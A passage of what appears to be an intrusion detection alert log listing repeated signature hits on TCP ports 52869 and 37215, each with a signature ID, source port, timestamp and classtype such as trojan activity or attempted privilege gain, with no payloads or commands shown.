                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.381812
                      SID:2025132
                      Source Port:41288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.194002
                      SID:2025132
                      Source Port:52936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.664606
                      SID:2829579
                      Source Port:51336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.027075
                      SID:2831300
                      Source Port:43632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.326732
                      SID:2027339
                      Source Port:48686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.945909
                      SID:2027339
                      Source Port:40546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.032492
                      SID:2829579
                      Source Port:59880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650643
                      SID:2835222
                      Source Port:57514
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.087294
                      SID:2027339
                      Source Port:48788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.703412
                      SID:2027339
                      Source Port:41478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.592736
                      SID:2027339
                      Source Port:46258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220866
                      SID:2835222
                      Source Port:45112
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633810
                      SID:2829579
                      Source Port:34066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2829579
                      Source Port:57406
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.981855
                      SID:2829579
                      Source Port:46582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.325400
                      SID:2027339
                      Source Port:38942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.651026
                      SID:2829579
                      Source Port:38614
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.109136
                      SID:2025132
                      Source Port:40670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.146648
                      SID:2025132
                      Source Port:41232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.592140
                      SID:2831300
                      Source Port:36644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.566623
                      SID:2025132
                      Source Port:59894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.947663
                      SID:2025132
                      Source Port:33434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.299284
                      SID:2027339
                      Source Port:54778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.278892
                      SID:2027339
                      Source Port:35746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.574948
                      SID:2027339
                      Source Port:38282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.458332
                      SID:2025132
                      Source Port:51990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2829579
                      Source Port:33656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.774505
                      SID:2025132
                      Source Port:41374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.975330
                      SID:2835222
                      Source Port:41040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2829579
                      Source Port:41416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.161942
                      SID:2027339
                      Source Port:55620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.092270
                      SID:2025132
                      Source Port:57310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2835222
                      Source Port:55258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650643
                      SID:2835222
                      Source Port:59830
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.688551
                      SID:2025132
                      Source Port:49478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.036421
                      SID:2025132
                      Source Port:35630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.919195
                      SID:2027339
                      Source Port:58878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044417
                      SID:2835222
                      Source Port:41170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.731900
                      SID:2025132
                      Source Port:56188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.749469
                      SID:2027339
                      Source Port:45456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.177524
                      SID:2027339
                      Source Port:56158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.197251
                      SID:2831300
                      Source Port:53646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.147883
                      SID:2025132
                      Source Port:59578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.159166
                      SID:2027339
                      Source Port:60328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.791706
                      SID:2027339
                      Source Port:49938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.182969
                      SID:2025132
                      Source Port:59766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.083569
                      SID:2831300
                      Source Port:54864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.727671
                      SID:2831300
                      Source Port:59060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.095698
                      SID:2835222
                      Source Port:51666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.420715
                      SID:2027339
                      Source Port:41268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.965535
                      SID:2027339
                      Source Port:44980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.471349
                      SID:2025132
                      Source Port:33208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.057359
                      SID:2027339
                      Source Port:38558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.835178
                      SID:2025132
                      Source Port:59778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.991336
                      SID:2829579
                      Source Port:35894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.161851
                      SID:2025132
                      Source Port:38102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.524729
                      SID:2025132
                      Source Port:47114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.152427
                      SID:2835222
                      Source Port:53950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.930155
                      SID:2027339
                      Source Port:57282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2829579
                      Source Port:58398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.944836
                      SID:2027339
                      Source Port:55484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.651536
                      SID:2829579
                      Source Port:38282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.250039
                      SID:2027339
                      Source Port:38152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.962852
                      SID:2025132
                      Source Port:59642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.280308
                      SID:2027339
                      Source Port:55862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321300
                      SID:2829579
                      Source Port:38676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.636234
                      SID:2027339
                      Source Port:50636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.966322
                      SID:2027339
                      Source Port:55386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.158278
                      SID:2829579
                      Source Port:39054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322288
                      SID:2831300
                      Source Port:60192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.318733
                      SID:2027339
                      Source Port:41494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.039129
                      SID:2835222
                      Source Port:55026
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.202570
                      SID:2025132
                      Source Port:58744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.919746
                      SID:2027339
                      Source Port:57832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.788688
                      SID:2025132
                      Source Port:51846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.332163
                      SID:2831300
                      Source Port:40454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.787786
                      SID:2025132
                      Source Port:43082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2829579
                      Source Port:42402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.640473
                      SID:2831300
                      Source Port:33286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.175900
                      SID:2829579
                      Source Port:50092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.450130
                      SID:2027339
                      Source Port:58138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2829579
                      Source Port:36520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.290518
                      SID:2027339
                      Source Port:40086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.358696
                      SID:2027339
                      Source Port:43296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.267254
                      SID:2025132
                      Source Port:57088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.049603
                      SID:2829579
                      Source Port:40608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.212922
                      SID:2027339
                      Source Port:40040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634497
                      SID:2835222
                      Source Port:41068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.647416
                      SID:2027339
                      Source Port:48246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.302645
                      SID:2831300
                      Source Port:44116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.809920
                      SID:2027339
                      Source Port:54402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.951975
                      SID:2829579
                      Source Port:39574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221748
                      SID:2829579
                      Source Port:47728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.719313
                      SID:2027339
                      Source Port:39752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636425
                      SID:2829579
                      Source Port:53820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.075399
                      SID:2027339
                      Source Port:55444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.822700
                      SID:2027339
                      Source Port:49678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.894921
                      SID:2831300
                      Source Port:55432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.441890
                      SID:2027339
                      Source Port:50686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.296076
                      SID:2829579
                      Source Port:45744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.292992
                      SID:2027339
                      Source Port:33712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.952782
                      SID:2835222
                      Source Port:49764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.207719
                      SID:2025132
                      Source Port:59236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2835222
                      Source Port:42152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.654173
                      SID:2835222
                      Source Port:42294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.916672
                      SID:2027339
                      Source Port:46732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.743446
                      SID:2025132
                      Source Port:52870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.124696
                      SID:2829579
                      Source Port:33298
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.837135
                      SID:2831300
                      Source Port:47254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.978983
                      SID:2027339
                      Source Port:57384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.019773
                      SID:2027339
                      Source Port:42918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.677189
                      SID:2027339
                      Source Port:54180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.655551
                      SID:2835222
                      Source Port:34602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.731126
                      SID:2027339
                      Source Port:56040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.704267
                      SID:2025132
                      Source Port:55242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.924852
                      SID:2027339
                      Source Port:52002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.694589
                      SID:2025132
                      Source Port:48562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.084136
                      SID:2027339
                      Source Port:46518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.058270
                      SID:2027339
                      Source Port:54394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.156178
                      SID:2027339
                      Source Port:49758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.434719
                      SID:2831300
                      Source Port:34494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2835222
                      Source Port:52358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.111381
                      SID:2829579
                      Source Port:59232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.975158
                      SID:2829579
                      Source Port:58306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.147980
                      SID:2831300
                      Source Port:56432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.979565
                      SID:2835222
                      Source Port:53294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.277250
                      SID:2027339
                      Source Port:54614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.097048
                      SID:2027339
                      Source Port:44602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.522141
                      SID:2025132
                      Source Port:57308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.690149
                      SID:2025132
                      Source Port:55002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.590753
                      SID:2027339
                      Source Port:46306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.951975
                      SID:2835222
                      Source Port:46354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.187391
                      SID:2027339
                      Source Port:50668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.425705
                      SID:2027339
                      Source Port:39430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.039128
                      SID:2835222
                      Source Port:39040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.178669
                      SID:2025132
                      Source Port:44326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.854405
                      SID:2025132
                      Source Port:50904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221583
                      SID:2835222
                      Source Port:35138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.331748
                      SID:2027339
                      Source Port:53304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.790558
                      SID:2831300
                      Source Port:47720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.130270
                      SID:2025132
                      Source Port:54738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.285038
                      SID:2835222
                      Source Port:40002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.243820
                      SID:2831300
                      Source Port:38550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.076019
                      SID:2027339
                      Source Port:38152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.230950
                      SID:2829579
                      Source Port:45392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.871315
                      SID:2027339
                      Source Port:47642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.664090
                      SID:2831300
                      Source Port:52998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.901420
                      SID:2027339
                      Source Port:53268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.275256
                      SID:2835222
                      Source Port:42886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.452336
                      SID:2025132
                      Source Port:40572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.350108
                      SID:2831300
                      Source Port:34098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.139934
                      SID:2027339
                      Source Port:59082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.085271
                      SID:2027339
                      Source Port:48530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2835222
                      Source Port:50252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.722161
                      SID:2831300
                      Source Port:51824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221910
                      SID:2829579
                      Source Port:51880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.345402
                      SID:2025132
                      Source Port:39066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.360754
                      SID:2831300
                      Source Port:33704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2829579
                      Source Port:50466
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2829579
                      Source Port:41726
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.064325
                      SID:2027339
                      Source Port:59782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2835222
                      Source Port:59684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.006983
                      SID:2027339
                      Source Port:45886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.826513
                      SID:2025132
                      Source Port:51264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.714534
                      SID:2027339
                      Source Port:44018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.105161
                      SID:2025132
                      Source Port:43056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.045144
                      SID:2835222
                      Source Port:38872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2835222
                      Source Port:53880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.979752
                      SID:2829579
                      Source Port:48092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.145029
                      SID:2025132
                      Source Port:33326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221570
                      SID:2829579
                      Source Port:53302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2829579
                      Source Port:40856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.704267
                      SID:2831300
                      Source Port:44400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.307219
                      SID:2829579
                      Source Port:54792
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.136561
                      SID:2831300
                      Source Port:60018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.593003
                      SID:2027339
                      Source Port:49616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.500263
                      SID:2027339
                      Source Port:38876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.729778
                      SID:2027339
                      Source Port:54816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.751559
                      SID:2025132
                      Source Port:46830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.099180
                      SID:2831300
                      Source Port:51752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
